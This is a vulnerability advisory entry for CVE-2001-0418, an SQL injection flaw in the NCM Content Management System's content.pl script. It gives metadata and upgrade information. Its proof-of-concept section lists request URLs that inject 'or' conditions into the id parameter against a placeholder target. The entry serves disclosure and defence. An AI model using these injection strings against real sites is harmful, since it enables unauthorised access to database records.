NCM Content Management System content.pl Input Validation Vulnerability
BID:2584
Info
NCM Content Management System content.pl Input Validation Vulnerability
| Bugtraq ID: | 2584 |
| Class: | Input Validation Error |
| CVE: |
CVE-2001-0418 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 13 2001 12:00AM |
| Updated: | Jul 11 2009 06:06AM |
| Credit: | This vulnerability was announced to Bugtraq in a RA-Soft Security Advisory posted on April 13, 2001. |
| Vulnerable: |
NCM Content Management System |
| Not Vulnerable: | |
Exploit / POC
NCM Content Management System content.pl Input Validation Vulnerability
http://www.TARGET/content.pl?group=49&id=140a
http://www.TARGET/content.pl?group=49&id=140%20or%20id>0%20or%20ls_id<1000%20or%20kategorie<10000%20or%20kategorie>10%20or%20ls_id>1%20or%20id<10%20or%20kategorie<10%20or%20kategorie>4&shortdetail=1
http://www.TARGET/content.pl?group=49&id=140a
http://www.TARGET/content.pl?group=49&id=140%20or%20id>0%20or%20ls_id<1000%20or%20kategorie<10000%20or%20kategorie>10%20or%20ls_id>1%20or%20id<10%20or%20kategorie<10%20or%20kategorie>4&shortdetail=1
Solution / Fix
NCM Content Management System content.pl Input Validation Vulnerability
Solution:
An upgrade has been released:
NCM Content Management System
Solution:
An upgrade has been released:
NCM Content Management System
-
NCM Content Management System
There is currently no link to the upgraded software. This link will take the interested party to a mail interface that will allow them to contact a representative of NCM.
http://www.thinkthewebway.com/en/services/hotline/responder.pl